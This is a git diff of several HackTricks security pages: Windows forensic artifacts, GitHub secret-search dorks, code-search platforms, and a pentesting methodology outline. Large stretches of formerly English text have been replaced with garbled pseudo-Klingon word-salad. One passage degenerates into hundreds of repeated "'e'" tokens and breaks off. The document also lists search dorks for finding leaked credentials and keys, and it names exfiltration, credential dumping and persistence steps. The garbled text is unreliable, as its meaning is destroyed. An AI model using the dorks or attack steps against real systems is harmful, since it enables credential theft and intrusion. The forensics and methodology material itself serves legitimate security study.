Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### USB Detective ### USB Detective
[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image. [**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
![](<../../../.gitbook/assets/image (483).png>)
### Plug and Play Cleanup ### Plug and Play Cleanup
The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion. The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion.
@ -174,14 +156,13 @@ The task is located at the following path:
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
A screenshot depicting the task's content is provided: A screenshot depicting the task's content is provided:
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
**Key Components and Settings of the Task:** **Key Components and Settings of the Task:**
- **pnpclean.dll**: This DLL is responsible for the actual cleanup process. - **pnpclean.dll**: This DLL is responsible for the actual cleanup process.
- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine. - **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine.
- **MaintenanceSettings**: - **MaintenanceSettings**:
- **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance. - **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance.
- **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance. - **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance.
This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures. This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures.
@ -196,8 +177,6 @@ Emails contain **2 interesting parts: The headers and the content** of the email
Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages: Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages:
![](<../../../.gitbook/assets/image (484).png>)
### Windows Mail App ### Windows Mail App
This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension. This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension.
@ -223,23 +202,20 @@ In the Microsoft Outlook client, all the sent/received messages, contacts data,
The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used. The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used.
You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
![](<../../../.gitbook/assets/image (485).png>)
### Microsoft Outlook OST Files ### Microsoft Outlook OST Files
An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized. **OST file** jatlh Microsoft Outlook Daq configured **IMAP** or **Exchange** server, storing similar information to PST file. **12 cha'logh** **retaining data** **50GB maximum size** synchronized file, PST file directory. OST file, [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized.
### Retrieving Attachments ### Retrieving Attachments
Lost attachments might be recoverable from: Lost attachments might be recoverable from:
- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` - **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` - **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
### Thunderbird MBOX Files ### Thunderbird MBOX Files
**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. **Thunderbird** **MBOX files** utilize data storage, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
### Image Thumbnails ### Image Thumbnails
@ -249,7 +225,7 @@ Lost attachments might be recoverable from:
### Windows Registry Information ### Windows Registry Information
The Windows Registry, storing extensive system and user activity data, is contained within files in: Windows Registry, storing extensive system and user activity data, contained within files in:
- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys. - `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys.
- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`. - `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`.
@ -310,11 +286,9 @@ The file name is created as `{program_name}-{hash}.pf` (the hash is based on the
The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program. The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program.
To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
```bash ```bash
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder" .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
``` ```
![](<../../../.gitbook/assets/image (487).png>) ![](<../../../.gitbook/assets/image (487).png>)
### Superprefetch ### Superprefetch
@ -343,46 +317,38 @@ It gives the following information:
This information is updated every 60 mins. This information is updated every 60 mins.
You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump). You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump).
```bash ```bash
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum .\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
``` ```
### AppCompatCache (ShimCache) ### AppCompatCache (ShimCache)
The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include: **AppCompatCache**, jupwI' **ShimCache**, **Microsoft** qorDu' **Application Compatibility Database** vItlhutlh. vaj **file metadata** vItlhutlh:
- Full path of the file - **file** **Full path**
- Size of the file - **file** **Size**
- Last Modified time under **$Standard\_Information** (SI) - **Last Modified time** **$Standard\_Information** (SI) Daq
- Last Updated time of the ShimCache - **ShimCache** **Last Updated time**
- Process Execution Flag - **Process Execution Flag**
Such data is stored within the registry at specific locations based on the version of the operating system: vaj registry Daq vItlhutlh data stored vItlhutlh:
- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries. - **XP** Daq, **data** stored **SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache** vItlhutlh, **96 entries** vItlhutlh.
- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively. - **Server 2003**, **Windows versions 2008, 2012, 2016, 7, 8, vaj 10** Daq, **storage path** **SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache** vItlhutlh, **512 vaj 1024 entries** vItlhutlh.
To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use. vItlhutlh **stored information** **parse** vaj, [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) **recommended** vItlhutlh.
![](<../../../.gitbook/assets/image (488).png>) ![](<../../../.gitbook/assets/image (488).png>)
### Amcache ### Amcache
The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`. **Amcache.hve** **file** **registry hive** vItlhutlh, **applications** **logs** **executed** **system**. **typically** **found** **C:\Windows\AppCompat\Programas\Amcache.hve**.
This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system. **file** **notable** **records** **recently executed processes**, **paths** **executable files** **SHA1 hashes**. **information** **invaluable** **tracking** **activity** **applications** **system**.
To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format:
**extract** **analyze** **data** **Amcache.hve**, [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) **tool** **used**. **following command** **example** **AmcacheParser** **parse** **contents** **Amcache.hve** **file** **output** **results** **CSV format**:
```bash ```bash
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
``` ```
Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries.
The most interesting CVS file generated is the `Amcache_Unassociated file entries`.
### RecentFileCache ### RecentFileCache
This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries. This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries.
@ -501,7 +467,6 @@ Recorded by EventID 4616, changes to system time can complicate forensic analysi
#### USB Device Tracking #### USB Device Tracking
Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps. Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps.
#### System Power Events #### System Power Events
EventID 6005 indicates system startup, while EventID 6006 marks shutdown. EventID 6005 indicates system startup, while EventID 6006 marks shutdown.

View file

@ -28,7 +28,7 @@ Other ways to support HackTricks:
### **Access Time Tracking** ### **Access Time Tracking**
- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use: - By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use:
`fsutil behavior set disablelastaccess 0` `fsutil behavior set disablelastaccess 0`
### Windows Versions and Service Packs ### Windows Versions and Service Packs
- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features. - The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features.

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -128,20 +126,3 @@ This is run from **userinit.exe** which should be terminated, so **no parent** s
* Is running under the expected SID? * Is running under the expected SID?
* Is the parent process the expected one (if any)? * Is the parent process the expected one (if any)?
* Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?) * Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View file

@ -40,7 +40,6 @@ Now that we have built the list of assets of our scope it's time to search for s
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
### **Dorks** ### **Dorks**
```bash ```bash
".mlab.com password" ".mlab.com password"
"access_key" "access_key"
@ -322,7 +321,6 @@ GCP SECRET
AWS SECRET AWS SECRET
"private" extension:pgp "private" extension:pgp
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

View file

@ -1,43 +1,43 @@
# Wide Source Code Search # QaD jImej
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>! </strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>ghItlhvam AWS hacking jImej</strong></a> jImejnIS.</summary>
Other ways to support HackTricks: HackTricks qIpDI'wI'vam jImej:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **HackTricks vItlhutlh** pe'vIl **company advertise** 'ej **HackTricks PDF download** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **chaw'}'a'**.
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **ghItlhvam**.
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **ghItlhvam** [**NFTs**](https://opensea.io/collection/the-peass-family) **ghItlhvam**.
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
The goal of this page is to enumerate **platforms that allow to search for code** (literal or regex) in across thousands/millions of repos in one or more platforms. jImejvam'e' vItlhutlh **platforms that allow to search for code** (literal or regex) **repos thousands/millions** platforms.
This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns. **Search for leaked information** **vulnerabilities** patterns **search** several occasions **helps**.
* [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. * [**SourceGraph**](https://sourcegraph.com/search): **Search millions repos**. **free version** **enterprise version** (15 days free). **regexes** support.
* [**Github Search**](https://github.com/search): Search across Github. It supports regexes. * [**Github Search**](https://github.com/search): **Search Github**. **regexes** support.
* Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/). * **Github Code Search**](https://cs.github.com/) **useful** check also.
* [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Search across Gitlab projects. Support regexes. * [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): **Search Gitlab projects**. **regexes** Support.
* [**SearchCode**](https://searchcode.com/): Search code in millions of projects. * [**SearchCode**](https://searchcode.com/): **Search code millions projects**.
{% hint style="warning" %} {% hint style="warning" %}
When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! **git log -p** **run** repo **leaks** **look** **don't forget** **other branches with other commits** containing secrets!
{% endhint %} {% endhint %}
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>! </strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>ghItlhvam AWS hacking jImej</strong></a> jImejnIS.</summary>
Other ways to support HackTricks: HackTricks qIpDI'wI'vam jImej:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **HackTricks vItlhutlh** pe'vIl **company advertise** 'ej **HackTricks PDF download** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **chaw'}'a'**.
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **ghItlhvam**.
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **ghItlhvam** [**NFTs**](https://opensea.io/collection/the-peass-family) **ghItlhvam**.
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -2,7 +2,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -93,84 +93,13 @@ If you have troubles with the shell, you can find here a small **compilation of
* [**Linux**](../linux-hardening/useful-linux-commands/) * [**Linux**](../linux-hardening/useful-linux-commands/)
* [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md) * [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md)
* [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/) * [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
### **9 -** [**Qa'vIn**](exfiltration.md)
### **9 -** [**Exfiltration**](exfiltration.md) **Qa'vIn** **vItlhutlh** **vItlhutlh** **vItlhutlh** **(ghorgh privilege escalation scripts)**. **ghaH** [**post about common tools that you can use with these purposes**](exfiltration.md)**.**
You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). **Here you have a** [**post about common tools that you can use with these purposes**](exfiltration.md)**.** ### **10- Qa'vIn**
### **10- Privilege Escalation**
#### **10.1- Local Privesc** #### **10.1- Local Privesc**
If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\ **root/Administrator** **ghorgh** **'e' vItlhutlh** **ghorgh** **vItlhutlh**.\
Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ **'ej** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'
You should also check this pages about how does **Windows work**:
* [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md)
* How does [**NTLM works**](../windows-hardening/ntlm/)
* How to [**steal credentials**](broken-reference/) in Windows
* Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
#### **10.2- Domain Privesc**
Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
### 11 - POST
#### **11**.1 - Looting
Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\
Find here different ways to [**dump passwords in Windows**](broken-reference/).
#### 11.2 - Persistence
**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.**\
**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
TODO: Complete persistence Post in Windows & Linux&#x20;
### 12 - Pivoting
With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\
In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](tunneling-and-port-forwarding.md).\
You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments..
### MORE
#### [Android Applications](../mobile-pentesting/android-app-pentesting/)
#### **Exploiting**
* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/)
* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
* [**Basic exploiting tools**](../exploiting/tools/)
#### [**Basic Python**](python/)
#### **Crypto tricks**
* [**ECB**](../cryptography/electronic-code-book-ecb.md)
* [**CBC-MAC**](../cryptography/cipher-block-chaining-cbc-mac-priv.md)
* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
